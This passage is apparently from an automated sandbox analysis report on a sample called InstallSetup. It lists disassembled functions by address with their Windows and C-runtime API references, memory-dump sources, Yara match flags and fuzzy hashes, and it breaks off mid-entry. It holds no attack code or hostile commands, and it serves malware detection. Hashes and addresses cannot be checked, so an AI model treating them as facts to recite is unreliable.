WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
__freea.LIBCMT ref: 0043231B

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

__freea.LIBCMT ref: 00432324
__freea.LIBCMT ref: 00432349

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698

Function 00971129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
Part of subcall function 00972141: _free.LIBCMT ref: 00972178
Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9

_free.LIBCMT ref: 00971444
_free.LIBCMT ref: 0097145D
_free.LIBCMT ref: 0097148F
_free.LIBCMT ref: 00971498
_free.LIBCMT ref: 009714A4

Strings

C, xrefs: 00971291

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction ID: d99ad775ea94633275325f35adfed0dfdc89a93246f2e90294f1068cb2c18e50
Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction Fuzzy Hash: 28B13976A01219DFDB24DF18C885BADB7B4FB48704F5085AAE94DA7361E730AE90CF40

Function 0097A115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0097A184
_free.LIBCMT ref: 0097A192
_free.LIBCMT ref: 0097A2C0
_free.LIBCMT ref: 0097A2CB

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction ID: fd84ffea0ae3700d1048a83f8f2703d942af9cd116486953538e014749980fa0
Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction Fuzzy Hash: 3361E172904205AFDB20CF68C842B9EBBF8FF85710F1481AAE958EB282D7719D419B55

Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F1D
_free.LIBCMT ref: 00439F2B
_free.LIBCMT ref: 0043A059
_free.LIBCMT ref: 0043A064

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59

Function 00973AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0096C4A4,E0830C40,?,?,?,?,?,?,0097425F,0094E03C,0096C4A4,?,0096C4A4,0096C4A4,0094E03C), ref: 00973B2C
__fassign.LIBCMT ref: 00973BA7
__fassign.LIBCMT ref: 00973BC2
WideCharToMultiByte.KERNEL32(?,00000000,0096C4A4,00000001,?,00000005,00000000,00000000), ref: 00973BE8
WriteFile.KERNEL32(?,?,00000000,0097425F,00000000,?,?,?,?,?,?,?,?,?,0097425F,0094E03C), ref: 00973C07
WriteFile.KERNEL32(?,0094E03C,00000001,0097425F,00000000,?,?,?,?,?,?,?,?,?,0097425F,0094E03C), ref: 00973C40

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction ID: 07e137e2fbff54249c56ddcb49127386f47ec91bfc7755057f64f064c7b92a0f
Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction Fuzzy Hash: 6D51A8759002099FDB11CFA4D845AEEBBF8EF09701F18826AE959F7251D7309A41CF64

Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
__fassign.LIBCMT ref: 00433940
__fassign.LIBCMT ref: 0043395B
WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69

Function 00964AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00964ACD

Part of subcall function 00964D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00964800), ref: 00964DAC

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00964AE2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00964AF1
__CxxThrowException@8.LIBVCRUNTIME ref: 00964AFF
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 00964B75
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00964BB5
__CxxThrowException@8.LIBVCRUNTIME ref: 00964BC3

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID:
API String ID: 3151764488-0
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: c2da296729d0afdfb2c81286840c769e5eb876d2595dc93a1d83f5f7b79eb2cd
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 0131B435A00214ABCF04EFE8C981B6E73B9FF85310F204569E9159B382DB70EE05C794

Function 0097FBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction ID: 0596ef30837e20da46eca133a39211d8496637e9670089f0862d81a9507a7c8b
Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction Fuzzy Hash: 52112937504119BFDB212F768C19A6B7B5CEFC2B60B248A35FC5DE7140DA348900D6B0

Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669

Function 0097A5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0097A331: _free.LIBCMT ref: 0097A35A

_free.LIBCMT ref: 0097A638

Part of subcall function 009736D1: HeapFree.KERNEL32(00000000,00000000,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?), ref: 009736E7
Part of subcall function 009736D1: GetLastError.KERNEL32(?,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?,?), ref: 009736F9

_free.LIBCMT ref: 0097A643
_free.LIBCMT ref: 0097A64E
_free.LIBCMT ref: 0097A6A2
_free.LIBCMT ref: 0097A6AD
_free.LIBCMT ref: 0097A6B8
_free.LIBCMT ref: 0097A6C3

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 6a527000f13114c886a0b141a80d28703e61384099789f4e2a45cb93c3290887
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: F0113A72644B04BADE20BBB1CC47FCF779CFFC0700F40C825B29DAA152DA65B6149651

Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3

_free.LIBCMT ref: 0043A3D1

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A3DC
_free.LIBCMT ref: 0043A3E7
_free.LIBCMT ref: 0043A43B
_free.LIBCMT ref: 0043A446
_free.LIBCMT ref: 0043A451
_free.LIBCMT ref: 0043A45C

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46

Function 00952659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00950DA0,?,?,?,00000000), ref: 00952667
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00950DA0,?,?,?,00000000), ref: 0095266D
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00950DA0,?,?,?,00000000), ref: 0095269A
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00950DA0,?,?,?,00000000), ref: 009526A4
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00950DA0,?,?,?,00000000), ref: 009526B6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009526CC
__CxxThrowException@8.LIBVCRUNTIME ref: 009526DA

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction ID: 9d98fbfd19d62470e8764d6c50a548e5cc4cb3bf23089f70b90fc6ed10e83acd
Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction Fuzzy Hash: E101A735502115A7D720FF66EC49FAF376CAF83B53B500926F805E2061DB25D90887A9

Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
__CxxThrowException@8.LIBVCRUNTIME ref: 00412473

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D

Function 009524A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0095670B), ref: 009524B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 009524C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 009524D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0095670B), ref: 00952500
GetProcAddress.KERNEL32(00000000), ref: 00952507
GetLastError.KERNEL32(?,?,?,0095670B), ref: 00952522
GetLastError.KERNEL32(?,?,?,0095670B), ref: 0095252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00952544
__CxxThrowException@8.LIBVCRUNTIME ref: 00952552

Strings

kernel32.dll, xrefs: 009524B0, 009524B5, 009524FA

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction ID: 09e05cbbfde34b834e0f7fbf727c97cdb790429c3dcb5434e76ac830b5134407
Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction Fuzzy Hash: 86F086759003103FAB117B766C8991B3FACDE47B233100636F811E21D2EA7589018658

Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C677

Strings

ios_base::failbit set, xrefs: 0040C644
F(@, xrefs: 0040C61B
ios_base::eofbit set, xrefs: 0040C649
F(@, xrefs: 0040C651
ios_base::badbit set, xrefs: 0040C63A, 0040C65A

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Exception@8Throw
String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-3619870194
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C

Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

_memcmp.LIBVCRUNTIME ref: 0043116C
_free.LIBCMT ref: 004311DD
_free.LIBCMT ref: 004311F6
_free.LIBCMT ref: 00431228
_free.LIBCMT ref: 00431231
_free.LIBCMT ref: 0043123D

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44

Function 0097239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,009725EC,00000001,00000001,?), ref: 009723F5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009725EC,00000001,00000001,?,?,?,?), ref: 0097247B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00972575
__freea.LIBCMT ref: 00972582

Part of subcall function 0097390E: RtlAllocateHeap.NTDLL(00000000,0094DAD7,00000000), ref: 00973940

__freea.LIBCMT ref: 0097258B
__freea.LIBCMT ref: 009725B0

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction ID: f61864667b6f6cfa0451b2ea1e559967b0a3d998706db3114ba0b34a93185cda
Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction Fuzzy Hash: 3A51EF73A2021BABEB258F64CC55FBF77A9EB84750F258628FC08D6150EB74DD40C664

Function 0096E419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0096E445
__cftoe.LIBCMT ref: 0096E477

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction ID: a84c9fc10c12703227fa7b6678a6278c1f9334b66decf24dfdc7ea776ca99671
Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction Fuzzy Hash: 34511D7A900205ABDF209B78CC45FAE77ACFF88374F54821AF819D6192EF35DD009664

Function 0096302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 00963051

Part of subcall function 00958AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 00958ABD

SafeSQueue.LIBCONCRT ref: 0096306A
Concurrency::location::_Assign.LIBCMT ref: 0096312A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0096314B
__CxxThrowException@8.LIBVCRUNTIME ref: 00963159

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3496964030-0
Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction ID: 7dc6b7e851646dfcd9683a5f752ac3b6f1a11fbff2bf20359fc4306284ea7056
Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction Fuzzy Hash: 1731F231A04A119FCB25EF65C841B6AB7B4FF84711F108569EC069B292DB30EE49CBC0

Function 00968F24 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00968F77
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00968F90
FindVITargetTypeInstance.LIBVCRUNTIME ref: 00968F97
PMDtoOffset.LIBCMT ref: 00968FB6

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID:
API String ID: 1467055271-0
Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
Instruction ID: 59b9dce2a644a2f1189c35bc4a8f6d0ff8c18935d10de507487479a1a9d67210
Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
Instruction Fuzzy Hash: 4E213672A042049FCF14DF68DD46BAF77B9EF84750B20872AF91093281EF35E90186E0

Function 00945437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

__Cnd_init.LIBCPMT ref: 0094544B
__Mtx_init.LIBCPMT ref: 00945471
std::_Cnd_initX.LIBCPMT ref: 00945494
__Thrd_start.LIBCPMT ref: 009454B9
std::_Cnd_waitX.LIBCPMT ref: 009454D9
std::_Cnd_initX.LIBCPMT ref: 00945506

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 2c9f06389b3cfce025fabd3ba3e64fa931f09f7e011859d8bf8059e692d2dcad
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: 94219E72C052089BDF15EBF8D841FDDB7F8AF49315F24405AF000B7292DB348A848665

Function 00969041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00969038,009669C9,00980907,00000008,00980C6C,?,?,?,?,00963CB2,?,?,0045A064), ref: 0096904F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0096905D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00969076
SetLastError.KERNEL32(00000000,?,00969038,009669C9,00980907,00000008,00980C6C,?,?,?,?,00963CB2,?,?,0045A064), ref: 009690C8

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 366b56c0cc0d3a9360a5773c3ee1280d00f2bb21b18da0de8bc66d42fafec465
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 46012B362097116EAB3427B4BC89A67278CEB45775B30033AF531912E2EF338C505989

Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

